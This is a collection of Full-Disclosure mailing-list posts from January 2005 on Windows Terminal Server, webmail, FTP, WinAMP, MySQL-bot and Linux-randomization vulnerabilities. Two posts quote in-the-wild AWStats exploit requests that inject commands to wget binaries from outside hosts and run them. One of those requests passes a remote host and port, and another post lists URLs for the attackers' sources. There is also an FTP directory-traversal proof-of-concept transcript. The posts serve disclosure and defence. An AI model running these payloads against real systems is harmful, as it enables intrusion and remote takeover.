Re: [Full-Disclosure] Terminal Server vulnerabilities
Hello, I agree with everyone that TS is prone to MiTM attacks, since there is no server authentication at all. Have a look at RDESKTOP sources and you will see a plaintext key exchange at the beginning of the TS session. I suspect this key is related to the L$HYDRAENCKEY_xxx LSA secret. Building a transparent RDP proxy with on-the-fly decryption seems feasible. And don't even think on using the encryption : low setting ! But I would point out something much more important : there are many more local exploits than remote (on Windows just like any other OS). Local exploits : about 1-2 a month * POSIX - OS/2 subsystem exploitation * Debugging subsystem exploitation (DebPloit) * 16-bit subsystem exploitation (NTVDM) * Shatter Attacks * Etc. Remote exploits : about once a year * RPC/DCOM (blaster) * LSASS (sasser) Basically, if you are logged in as an unpriviledged user on a Terminal Server, you can easily become SYSTEM. If this Terminal Server is also a Domain Controller, game over. Regards, - Nicolas RUFF --- Security Consultant EdelWeb (http://www.edelweb.fr/) Mail: nicolas.ruff (at) edelweb.fr --- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] /usr/bin/trn local root exploit
I could be wrong but on my system it's not a suid binary, how's this a local root? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] /usr/bin/trn local root exploit
On Thu, Jan 27, 2005 at 04:54:09AM -0500, ntx0f wrote: I could be wrong but on my system it's not a suid binary, how's this a local root? Maybe, by using some jedi mind tricks ? ;) -- * Wojciech Pawlikowski :: ducer at hard-core pl :: NIC-HDL WP5161-RIPE * * http://ducer.w00nf.org :: http://www.knockdownhc.com :: Born to Hate * ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] ITTS ADVISORE 01/05 - Uebimiau = 2.7.2 Multiples Vulnerabilities
ADVISORE 01 15/01/2005 INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORE http://www.intruders.com.br/ http://www.intruders.org.br/ ADVISORE/0105 - UEBIMIAU 2.7.2 MULTIPLES VULNERABILITIES PRIORITY: HIGH I - INTRODUCTION: From http://www.uebimiau.org/ UebiMiau is a simple, yet efficient cross-plataform POP3/IMAP mail reader written in PHP. It's have some many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit, etc. UebiMiau DOES NOT require database or extra PHP modules (--with-imap) II - DESCRIPTION: -- Intruders Tiger Team Security has identified multiples vulnerabilities in Uebimiau WebMail Server in default installation that can be exploited by malicious users to hijacking session files and others informations in target system. Intruders Tiger Team Security has discovered that many systems are vulnerables. III - ANALYSIS --- Uebimiau in default installation create one temporary folder to store sessions and other files. This folder is defined in inc/config.php as ./database/. If the web administrator don't change this folder, one attacker can exploit this using the follow request: http://server-target/database/_sessions/ If the Web server permit directory listing, the attacker can read session files. Other problem live in the way that the files of users are stored. In default installation the files of the users are stored using the follow model: $temporary_directory/user_domain/ A attacker can access files of users requesting: http://server-target/database/user_domain/ Where user is the target user and domain is the target domain. Intruders Tiger Team Security has found many servers vulnerable to these attacks. IV. DETECTION - Intruders Tiger Team Security has confirmed the existence of this vulnerability in Uebimiau version 2.7.2. Other versions possibly vulnerable too. V. WORKAROUND -- 1 STEP - Insert index.php in each directory of the Uebimiau. 2 STEP - Set variable $temporary_directory to a directory not public and with restricted access, set permission as read only to web server user for each files in $temporary_directory. 3 STEP - Set open_basedir in httpd.conf to yours clients follow the model below: Directory /server-target/public_html php_admin_value open_basedir /server-target/public_html /Directory VI - VENDOR RESPONSE 15/01/2005 - Flaw discovered. 18/01/2005 - Contacted Uebimiau Team. 20/01/2005 - Vendor response. 26/01/2005 - Advisore published. VII - CREDITS - Glaudson Ocampos(Nash Leon) and Intruders Tiger Team Security has discovery this vulnerability. Thanks to Wendel Guglielmetti Henrique (dum_dum) and Waldemar Nehgme from securityopensource.org.br. Visit Intruders Tiger Team Security Web Site for more advisores: http://www.intruders.com.br/ http://www.intruders.org.br/ ___ Yahoo! Acesso Grátis - Instale o discador do Yahoo! agora. http://br.acesso.yahoo.com/ - Internet rápida e grátis ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Slackware security updates
On the home page www.slackware.com read the news: /* 2004-11-27 Pat made a new entry in the ChangeLog giving us all some fresh news about his health conditions. He also stated (Pat's gpg signed message) that the security packages (patches) from the GUS-BR group (GUS GPG KEY) are trusted. EDITED on 2004-12-07 A mirror of the GUS-BR tree can be found on osuosl (ftp and http). */ There are no official patches in the website since november 2004, you should manually update your system... Or trust someone else's packages.. Or track the slackware-current... Matteo Giannone Navighi a 2 MEGA e i primi 3 mesi sono GRATIS. Scegli Libero Adsl Flat senza limiti su http://www.libero.it ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities
Of course, one of the very first things you should do on a Windows box is rename the administrator account, so this kind of blind brute-forcing is not possible. There are ways to find out the usernames that are admin they begin with 500_ ( do a Google search if you want ) Any script kiddy worth his salt will tell u this... So this one is off because renaming admin account will only be security thru obscurity witch is not good for the internet... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Terminal Server vulnerabilities
On Thu, 27 Jan 2005 09:00:39 +0100, Nicolas RUFF (lists) said: But I would point out something much more important : there are many more local exploits than remote (on Windows just like any other OS). Local exploits : about 1-2 a month * POSIX - OS/2 subsystem exploitation * Debugging subsystem exploitation (DebPloit) * 16-bit subsystem exploitation (NTVDM) * Shatter Attacks * Etc. Remote exploits : about once a year * RPC/DCOM (blaster) * LSASS (sasser) Basically, if you are logged in as an unpriviledged user on a Terminal Server, you can easily become SYSTEM. If this Terminal Server is also a Domain Controller, game over. You forgot one important factor - the use of IE and Outlook for the fast direct-to-customer delivery of local exploits. Which *also* results in a Game Over pgp2lyyWTzYx7.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Slackware Security updates
I've seen linux distributions sometimes posting here on full-disclosure it's security updates. Guys I always wanted to bring this up why do we have to send the updates to this list ? Why not make aother list just for this or anyone who wants the security alerts could get them directly from the original source Maybe this might save a lot of bandwidth -aditya Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities
There are ways to find out the usernames that are admin they begin with 500_ ( do a Google search if you want ) Any script kiddy worth his salt will tell u this... So this one is off because renaming admin account will only be security thru obscurity witch is not good for the internet... It's also only possible when you've got NetBIOS/CIFS open to the Internet, which is something even worse on the Internet. Even though the SID/RID of the administrator can be determined remotely under these conditions, I'd still recommend the renaming of the account as a standard hardening procedure. And fwiw, the fact that a security safeguard can be overcome is not a reason to completely disregard it. With this argumentation, you could sell your firewalls. Cheers, j. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Terminal services-additional help
In addition, You can install cygwin(www.cygwin.com) with openssh and tunnel terminal services through openssh(very simple to do with putty). And then use your router or firewall to block port 3389. -Eddie B. On Tue, 25 Jan 2005 14:38:30 -0600, Curt Purdy purdy at tecman.com wrote: The problem with terminal server is not any vulnerablities that can be exploited, but the fact that administrator can be bruteforced (6 attempts followed by reconnect) and that it is screaming its existence on port 3889. If you use it, definitely change the port in the registry. You can use the local security policy to prevent administrators from logging in via terminal services and then enable run as for administrative tasks...which should be done anyway. Changing the port number is another good step though. -- Jonathan ___ Join Excite! - http://www.excite.com The most personalized portal on the Web! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Slackware Security updates
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Maybe you should contact the Slackware maintainer(s) regarding this. FD has no control over slackware or any other distributions. []s On Wed, Jan 26, 2005 at 02:57:00PM -0200, Carlos de Oliveira wrote: Hi there! I've seen linux distributions sometimes posting here on full-disclosure it's security updates. I use slackware linux for some time, but i never give the importance to slackware updates and i want to know why there are no slackware updates announces here? Maybe slackware is so powerful that it doesn't need patches? ehheehh Or, where I can get the slack patches? Once again sorry my poor english, I am training. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html - -- Rodrigo Barbosa [EMAIL PROTECTED] Quid quid Latine dictum sit, altum viditur Be excellent to each other ... - Bill Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFB+RnXpdyWzQ5b5ckRAlaMAJ96KQRiWxgcR+IjuafKO9b5djy2CgCbBXEX +lckv/IX8eUx9aOER8FmJa4= =R2W9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution
* [EMAIL PROTECTED] (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]: There's an exploit in the wild. Here's what it does: 200.96.166.252 - - [26/Jan/2005:06:32:00 +] GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1 200 538 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 200.96.166.252 - - [26/Jan/2005:06:34:30 +] GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1 200 554 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) It's been out there for a while already: 208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] GET /cgi-bin/awstats.pl?year=2003rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1 200 47768 - LWP::Simple/5.800 Those files don't exist there anymore. -- Niels. -- (please reply to niels=bugtraq@ instead of niels-bugtraq@ - except for the gazillion autoresponders of course) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service
See Security, Research and Development www.see-security.com -- [-] Product Information SnugServer - All your Software Servers in 1 Application. Upload and download files to/from the Internet. Unique firewall file system where your FTP files can be stored in a data file to prevent internal network hacker attacks. Product Homepage: http://www.snugserver.com/ [-] Vulnerability Description A file traversal vulnerability has been discovered in SnugServer 3.0.0.40 FTP Service, which allows access to the server filesystem, outside of ftproot. [-]PoC [EMAIL PROTECTED]:/# ftp 192.168.1.154 Connected to 192.168.1.154. 220- Welcome FTP User. SnugServer is ready. Name (192.168.1.154:root): [EMAIL PROTECTED] 331 Password required for [EMAIL PROTECTED] Password: 230 See FTP Server Remote system type is You. ftp ls 200 PORT Command Successful. 150 Opening ASCII mode data connection for directory listing. drw-rw-rw- 1 ownergroup0 Jan 21 03:51 .. drw-rw-rw- 1 ownergroup0 Jan 21 02:08 dir 226 Transfer Complete. ftp cd ... 200 PORT Command Successful. ftp ls 200 PORT Command Successful. 150 Opening ASCII mode data connection for directory listing. drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 .. drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Cert drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Logs drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Requests drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Scripts drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Errors drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Queue drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 www drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Infected drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Temp drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 Filtered drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 BaseData -rw-rw-rw- 1 ownergroup 8421376 Jan 21 03:52 SNUG.FDB drw-rw-rw- 1 ownergroup 0 Jan 21 03:51 ftp -rw-rw-rw- 1 ownergroup 1861120 Jan 21 03:52 Snug.gbk -rw-rw-rw- 1 ownergroup 32 Jan 21 03:52 yarrow.rnd 226 Transfer Complete. ftp [-] Patch The vendor has been notified, and an update is available at: http://www.snugserver.com/download.php [-] Credits This vulnerability was discovered by muts ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Advances in Security in the Linux Kernel and RedHat idiocy
Just wanted to point out to you guys the INCREDIBLE advances in Linux security underway on LKML from security expert Arjan van de Ven: http://lkml.org/lkml/2005/1/27/62 On the subject of his i386-only mmap randomization patch: The randomisation range is 1 megabyte (this is bigger than the stack randomisation since the stack randomisation only needs 16 bytes alignment while the mmap needs page alignment, a 64kb range would not have given enough entropy to be effective) If we do a little math.. 1048576 / 4096 = 256 65536 / 16 = 4096 256 different locations for the mmap base, 4096 different locations for the stack (and apparently argv/envp pages get no randomization) Anyone with half a brain would see this is a joke, but not security expert Arjan van de Ven: http://lkml.org/lkml/2005/1/27/56 full randomisation makes it not possible to use absolute addresses in the exploit. I guess anyone who thinks that taking a hardcoded exploit and running it 256 times would always result in a successful exploit is stupid. In true non-hackery fashion, it has a sysctl entry that will disable randomization entirely if for instance a single developer on the system needs to debug a single application: http://lkml.org/lkml/2005/1/27/57 But then someone complained that it should be more fine-grained, so now if PT_GNU_STACK is disabled on the app, randomization will be turned off as well. I guess that's RedHat's definition of it. And remember kids, if you're owning Fedora or RHEL, you can bypass all this randomization (the junk in Exec-shield isn't any better) for suid apps by abusing a vuln in RedHat's glibc that leaks randomization info by using LD_DEBUG=files or LD_DEBUG=all or LD_TRACE_PRELINKING BTW, this remains unfixed since *AUGUST* of last year. Bugzilla reports were filed, even an LWN article was posted about the problem: http://lwn.net/Articles/99137/ 3 months later, on December 7th, Jakub committed a fix to glibc that I guess he never tested. The only change made was to add LD_DEBUG to unsecvars.h. If he had bothered to listen to other people, or looked at the fixes from other distros, he would have seen his fix wasn't enough. Yet now he's rejecting any bug reports on the subject, claiming he has fixed the problem: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=146207 Yet I've just verified from two separate users of Fedora Core 3 that the problem is indeed *NOT* fixed, verifying my analysis of elf/rtld.c that it was not fixed. Tilting the scale of security hype back to reality, -Brad signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Security Contact in Vonage
Hi, I am looking for a security contact in Vonage (www.vonage.com). I have tried more than once to call their number, and have stopped waiting after 15minutes of being put on hold. -- Noam Rathaus CTO Beyond Security Ltd. http://www.beyondsecurity.com http://www.securiteam.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NSFOCUS Security Advisory(SA2005-01) Topic: Buffer Overflow in WinAMP in_cdda.dll CDA Device Name Release Date: 2005-01-27 CVE CAN ID: CAN-2004-1150 http://www.nsfocus.com/english/homepage/research/0501.htm Affected systems software === Nullsoft WinAMP 5.0 Nullsoft WinAMP 5.01 Nullsoft WinAMP 5.02 Nullsoft WinAMP 5.03 Nullsoft WinAMP 5.04 Nullsoft WinAMP 5.05 Nullsoft WinAMP 5.06 Nullsoft WinAMP 5.07 Nullsoft WinAMP 5.08 Unaffected systems software = Nullsoft WinAMP 2.X Nullsoft WinAMP 5.08c Summary = WinAMP is a popular media player that supports various media and playlist formats, including playlists in m3u or pls format. NSFocus Security Team has found a buffer overflow vulnerability in the plug-in by which WinAMP plays CD. An attacker can construct a malicious playlist file that is embedded in a HTML page. If a user is persuaded to click it, then the attacker can gain complete control over the user's system. Description WinAMP implements various functionalities through different plug-ins that are stored in plugins sub-directory of WinAMP installation directory. For example, in_mp3.dll is used to play MP3 files and in_cdda.dll is used to play CD. The in_cdda.dll of WinAMP supports play path requests in the following format: 1. Driver\PathName\[FileName].cda 2. linein:// 3. cda:// 4. cda://Driver 5. cda://Driver,TrackNumber Brett Moore of Security-Assessment.com discovered a stack overflow when in_cdda.dll handles the first path. WinAMP released version 5.07 to fix that vulnerability. Actually, in_cdda.dll will still cause an overflow when handling 4th and 5th path above. Stack overflow will be triggered only by adding an over-long device name or sound track number behind cda://. Any method that can pass a play path to WinAMP can be used to trigger this vulnerability, for example, command line. One possible remote attacking vector is to construct a playlist file in m3u or pls format with an over-long path embedded in HTML. Once a user visits such a malicious page, it will execute the code of attacker's choice. Workaround = NSFOCUS suggests to remove in_cdda.dll from Plugins of WinAMP. Vendor Status == 2004.11.24 Informed the vendor [EMAIL PROTECTED], no response 2004.12.06 Tests proved winamp 5.07 is affected, informed the vendor again 2004.12.07 The vendor confirmed the vulnerability 2004.12.25 Tests proved winamp 5.08 is affected, informed the vendor 2005.01.10 The vendor released winamp 5.08c to fix the vulnerability The vendor has released winamp 5.08c to fix this vulnerability. The latest version is available at http://www.winamp.com/player/ Additional Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-1150 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries. Acknowledgment === Yu Yang of NSFOCUS Security Team found the vulnerability. DISCLAIMS == THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS AS IS WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. Copyright 1999-2005 NSFOCUS. All Rights Reserved. Terms of use. NSFOCUS Security Team [EMAIL PROTECTED] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com) PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFB+LIY1794d8am9toRAt5+AJ9fhmdoxO3wi4px9hPTftLUDfRllgCfYequ nhWVWcvuVIs8339yXR+TiPU= =yjQM -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?
Check out todays diary at SANS. http://isc.sans.org/ On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey [EMAIL PROTECTED] wrote: Aloha, Earlier tonight, i was sitting here at home doing some normal browsing, and work and my firewall alerted me that a program called spoolcll.exe was attempting to open up a port which i cannot remember now. i tried killing it, but it just came back, over and over again each time spawning itselfs on a new port. Registry says the worm created a service called evmon, it cannot be paused or stopped, but it can be disabled. The only information about this worm on google is a discussion at the following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921p=1 they are beginning to determinthat it is being distributed via a hole in mysql. Do any of you know anything about this? Thanks in advance. -- Love, Mike Bailey ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MDKSA-2005:020 - Updated kdegraphics packages fix buffer overflow vulnerability
On Jan 25, 2005, at 22:57, Rembrandt wrote: On Tue, 25 Jan 2005 21:51:01 -0700 Mandrake Linux Security Team [EMAIL PROTECTED] wrote: Dear Mandrake Linux Security Team, Why can't you spam another mailinglist? Or create an own for your PATCHES It nerves to get more then one mail from you at month. How do you provide something? Codes? ProofOfConcep-Exploits? You just write We fixed... Or in other words Hey guys there's something wrong with a package related to our OS. If MS would send every patch they wrote a mail to this mailinglist the list-owner would kickout MS for that. I don't know why it should be different for you or any other OS. Hmmm... like many other vendors, we spam a number of mailing lists (FD, bugtraq (when they feel like putting new messages through), and our own security-announce list). Do you rant at Gentoo, Debian, Ubuntu... (the list goes on) as well? Anyways, you seem to be a moderately intelligent person so why don't you setup a filter in sylpheed to send all mail from [EMAIL PROTECTED] to /dev/null? Should be pretty straightforward. That way you don't have to get nerved and the people who do appreciate the advisories can continue to receive them. If the list owners asked us to stop, we would respectfully do it. But, since you're asking, I think I'll just leave it up to you to figure out how to filter mail (it's a fairly amazing concept once you get it figured out). -- lynx -source http://linsec.ca/vdanen.asc | gpg --import {FEE30AD4 : 7F6C A60C 06C2 4811 FA1C A2BC 2EBC 5E32 FEE3 0AD4} PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Possible new MYSql Worm
Dear List , Watch out for Spoolcll.exe or connects to Port 3306. http://forums.whirlpool.net.au/forum-replies.cfm?t=291921p=1 http://isc.sans.org/index.php -- Thierry Zoller http://www.sniff-em.com/secureit.shtml ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Advances in Security in the Linux Kernel and RedHat idiocy
On Thu, Jan 27, 2005 at 11:10:43AM -0500, Brad Spengler wrote: Just wanted to point out to you guys the INCREDIBLE advances in Linux security underway on LKML from security expert Arjan van de Ven: http://lkml.org/lkml/2005/1/27/62 On the subject of his i386-only mmap randomization patch: The randomisation range is 1 megabyte (this is bigger than the stack randomisation since the stack randomisation only needs 16 bytes alignment while the mmap needs page alignment, a 64kb range would not have given enough entropy to be effective) If we do a little math.. 1048576 / 4096 = 256 65536 / 16 = 4096 256 different locations for the mmap base, 4096 different locations for the stack (and apparently argv/envp pages get no randomization) Anyone with half a brain would see this is a joke, but not security expert Arjan van de Ven: I think the joke is on you in this case. There is a large patch series of which you judge the first steps only. Those steps introduce the infrastructure and concepts into the kernel, and later patches will tweak the exact numbers to values with more entropy. ONCE THEY EXISTING INFRASTRUCTURE IS ACCEPTED AND DEBUGGED. Maybe you don't understand that, I assume a lot of the other readers of this list do. You don't plop a huge patch in the linux kernel in one chunk. You do it in nice small, incremental and debuggable steps. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability?
Definitly confusing but I believe it stems from a week root passwd. the bot first has to authenticate to mysql as 'root' user. then it seems to launch the exploit allowing it access to create the dynamic libraries containing User Defined Functions. On Thu, 27 Jan 2005 11:47:57 -0600, Dolan, Patrick [EMAIL PROTECTED] wrote: From the article text: The bot uses the MySQL UDF Dynamic Library Exploit. In order to launch the exploit, the bot first has to authenticate to mysql as 'root' user. A long list of passwords is included with the bot, and the bot will brute force the password. Looks like this is small part exploit, and large part bad root password selection. Though I'm not even sure about the exploit part because the text later says: This bot does not use any vulnerability in mysql. The fundamental weakness it uses is a week[sic] 'root' account. Patrick Dolan Information Security Analyst -Original Message- From: Jeremy Davis [mailto:[EMAIL PROTECTED] Sent: Thursday, January 27, 2005 11:23 AM To: Mike Bailey Cc: full-disclosure@lists.netsys.com Subject: Re: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability? Check out todays diary at SANS. http://isc.sans.org/ On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey [EMAIL PROTECTED] wrote: Aloha, Earlier tonight, i was sitting here at home doing some normal browsing, and work and my firewall alerted me that a program called spoolcll.exe was attempting to open up a port which i cannot remember now. i tried killing it, but it just came back, over and over again each time spawning itselfs on a new port. Registry says the worm created a service called evmon, it cannot be paused or stopped, but it can be disabled. The only information about this worm on google is a discussion at the following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921p=1 they are beginning to determinthat it is being distributed via a hole in mysql. Do any of you know anything about this? Thanks in advance. -- Love, Mike Bailey ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Disclaimer: This electronic message, including any attachments, is confidential and intended solely for use of the intended recipient(s). This message may contain information that is privileged or otherwise protected from disclosure by applicable law. Any unauthorized disclosure, dissemination, use or reproduction is strictly prohibited. If you have received this message in error, please delete it and notify the sender immediately. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?
my firewall alerted me that a program called spoolcll.exe the worm created a service called evmon The only information about this worm on google is a discussion at the following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921p=1 they are beginning to determin that it is being distributed via a hole in mysql. There is a slashdot.org article comments. It looks like it exploits a few sysadmin brain vulnerabilities: weak password, bad practice. I guess the mysql vulnerability is required for copyingexecuting the bot. http://it.slashdot.org/it/05/01/27/1546222.shtml?tid=220tid=172tid=95 *Don't keep the port open!* by [EMAIL PROTECTED] 99.99% of people who run MySQL run it on the same machine as their webserver that queries it. Most people don't actually do queries /across the network/ to the database server. Just run MySQL with --skip-networking at startup (skip-networking in my.cnf), to disable MySQL from listening on port 3306. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability?
From the article text: The bot uses the MySQL UDF Dynamic Library Exploit. In order to launch the exploit, the bot first has to authenticate to mysql as 'root' user. A long list of passwords is included with the bot, and the bot will brute force the password. Looks like this is small part exploit, and large part bad root password selection. Though I'm not even sure about the exploit part because the text later says: This bot does not use any vulnerability in mysql. The fundamental weakness it uses is a week[sic] 'root' account. Patrick Dolan Information Security Analyst -Original Message- From: Jeremy Davis [mailto:[EMAIL PROTECTED] Sent: Thursday, January 27, 2005 11:23 AM To: Mike Bailey Cc: full-disclosure@lists.netsys.com Subject: Re: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability? Check out todays diary at SANS. http://isc.sans.org/ On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey [EMAIL PROTECTED] wrote: Aloha, Earlier tonight, i was sitting here at home doing some normal browsing, and work and my firewall alerted me that a program called spoolcll.exe was attempting to open up a port which i cannot remember now. i tried killing it, but it just came back, over and over again each time spawning itselfs on a new port. Registry says the worm created a service called evmon, it cannot be paused or stopped, but it can be disabled. The only information about this worm on google is a discussion at the following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921p=1 they are beginning to determinthat it is being distributed via a hole in mysql. Do any of you know anything about this? Thanks in advance. -- Love, Mike Bailey ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Disclaimer: This electronic message, including any attachments, is confidential and intended solely for use of the intended recipient(s). This message may contain information that is privileged or otherwise protected from disclosure by applicable law. Any unauthorized disclosure, dissemination, use or reproduction is strictly prohibited. If you have received this message in error, please delete it and notify the sender immediately. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution
Delian Krustev wrote: There's an exploit in the wild. Here's what it does: 200.96.166.252 - - [26/Jan/2005:06:32:00 +] GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1 200 538 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 200.96.166.252 - - [26/Jan/2005:06:34:30 +] GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1 200 554 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) I don't have the time to investigate the cgi and dc binaries. The cgi at least tries to daemonize and opens a TCP listening socket. They also try to replace the index page on the vulnerable site. In the same site you can download : wget http://www.nokiacentrum.cz/dcha0s/dc.c wget http://www.nokiacentrum.cz/dcha0s/cgi.c ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Advances in Security in the Linux Kernel and RedHat idiocy
